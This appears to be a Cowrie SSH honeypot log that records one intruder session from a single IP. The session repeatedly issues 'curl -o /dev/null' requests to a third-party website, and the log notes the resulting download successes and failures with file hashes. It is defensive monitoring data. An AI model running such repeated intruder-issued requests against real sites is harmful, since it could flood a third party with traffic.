{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:51.458037Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:51.472319Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:51.473038Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:51.511706Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:51.512453Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:51.566381Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:51.567226Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:51.604292Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:51.605114Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:51.630606Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:51.642603Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:51.643171Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:51.666996Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:51.680424Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:51.681098Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:51.708827Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:51.709546Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:51.720045Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:51.720833Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:51.758254Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:51.759084Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:51.799815Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:51.801023Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:51.829025Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:51.840624Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:51.841368Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:51.881048Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:51.881892Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:51.905277Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:51.925846Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:51.926692Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:51.976996Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:51.977856Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:52.003371Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:52.018510Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:52.019280Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:52.056292Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:52.057088Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:52.062055Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:52.081787Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:52.095166Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:52.095972Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:52.136388Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:52.137185Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:52.174314Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:52.175084Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:52.214574Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:52.215348Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:52.224173Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:52.252639Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:52.253498Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:52.284264Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:52.290244Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:52.290962Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:52.329900Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:52.330762Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:52.361084Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:52.379311Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:52.380071Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:52.421369Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:52.422147Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:52.447600Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:52.459865Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:52.460600Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:52.502728Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:52.503523Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:52.541428Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:52.542728Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:52.579736Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:52.580542Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:52.618022Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:52.619293Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:52.658000Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:52.658846Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:52.695940Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:52.697100Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:52.736640Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:52.737403Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:52.788454Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:52.789209Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:52.825717Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:52.826447Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:52.854246Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:52.863387Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:52.864080Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:52.889936Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:52.902214Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:52.902914Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:52.941293Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:52.942036Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:52.969018Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:52.980237Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:52.980935Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:53.018528Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:53.019726Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:53.053595Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:53.054506Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:53.060168Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:53.061409Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:53.109024Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:53.122473Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:53.123653Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:53.128646Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
